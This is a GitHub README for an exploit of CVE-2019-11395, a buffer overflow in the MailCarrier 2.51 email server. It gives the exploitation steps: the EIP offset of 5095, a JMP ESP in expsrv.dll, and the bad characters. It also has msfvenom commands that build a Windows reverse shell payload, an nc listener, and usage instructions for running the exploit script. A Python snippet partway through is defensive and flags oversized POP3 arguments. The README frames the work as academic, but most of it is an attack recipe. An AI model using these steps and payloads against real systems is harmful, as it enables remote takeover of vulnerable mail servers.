caioprince/CVE-2019-11395

CVE-2019-11395 Exploit 🛡️

About CVE-2019-11395 🕵️

CVE-2019-11395 is a buffer overflow vulnerability in the MailCarrier 2.51 email application that allows remote code execution. The overflow is triggered in the handling of the SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR commands.

During an academic study, the POP3 commands were chosen as the target for a Proof of Concept (PoC). It was found that sending 6000 bytes to the application causes it to stop functioning (crash), which confirms the buffer overflow.
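As a defender-side counterpart to the crash described above, the following added example (not code from this repository) inspects POP3 client command lines and flags arguments that exceed the 40-character limit RFC 1939 allows, which is the kind of oversized USER/LIST/TOP/RETR input that triggers the MailCarrier overflow. The sample lines, the 6000-byte USER line included, are constructed.

```python
"""Flag POP3 command lines with oversized arguments (added example, not from the repo)."""
import re

# RFC 1939 section 3: each POP3 argument may be up to 40 characters long.
MAX_ARG_LEN = 40
# POP3 commands the advisory names as vulnerable in MailCarrier 2.51.
VULNERABLE_CMDS = {"USER", "LIST", "TOP", "RETR"}

# Keyword of 3-4 letters, optionally followed by whitespace and arguments.
CMD_RE = re.compile(r"^([A-Za-z]{3,4})(?:\s+(.*))?$")


def inspect_line(line):
    """Return a finding dict for one client line, or None if it looks benign."""
    text = line.rstrip("\r\n")
    m = CMD_RE.match(text)
    if not m:
        # Not a well-formed keyword (e.g. a long run of bytes with no space); report raw length.
        return {"cmd": None, "reason": "malformed", "length": len(text)}
    cmd = m.group(1).upper()
    args = m.group(2) or ""
    if len(args) <= MAX_ARG_LEN:
        return None
    reason = "oversized_arg" if cmd in VULNERABLE_CMDS else "oversized_arg_other"
    return {"cmd": cmd, "reason": reason, "length": len(args)}


def scan(lines):
    """Run inspect_line over a sequence of client lines and keep the findings."""
    return [f for f in (inspect_line(ln) for ln in lines) if f]


# Constructed sample of client traffic; the fifth line mimics the 6000-byte crash input.
SAMPLE = [
    "USER alice\r\n",
    "PASS hunter2\r\n",
    "LIST\r\n",
    "RETR 1\r\n",
    "USER " + "A" * 6000 + "\r\n",
    "TOP 1 " + "B" * 100 + "\r\n",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```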

Exploitation Steps 🔍

  1. Used msf-pattern_create -l 6000 to generate a unique pattern for locating the EIP overwrite.
  2. Identified the EIP offset with msf-pattern_offset -q 6E47386E -l 6000, which gave an EIP offset of 5095.
  3. Identified expsrv.dll, compiled without ASLR, as a suitable module for a JMP ESP.
  4. Identified the bad characters \x00\x0a\x0d during the invalid-character tests.
  5. Generated the payload with msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
  6. Adjusted the CVE-2019-11395.py code to accommodate the payload.
  7. Started a listener with nc -lnvp 4444 and ran the exploit (CVE-2019-11395.py) to gain access to the environment and validate the described CVE.

Usage 🚀

Follow these steps to use the exploit:

  1. Generate the payload using msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
  2. Copy the output of the msfvenom command.
  3. Edit CVE-2019-11395.py and replace the shellcode variable with the output of the msfvenom command.
  4. Run the exploit (CVE-2019-11395.py) to gain access to the environment and validate the described CVE.

Compromised Environment 📸

(Screenshot: PoC CVE-2019-11395)

🔗 Connect with me

Visit my profile on LinkedIn

About

An exploit for the CVE-2019-11395 vulnerability in the MailCarrier 2.51 email application, enabling remote code execution.
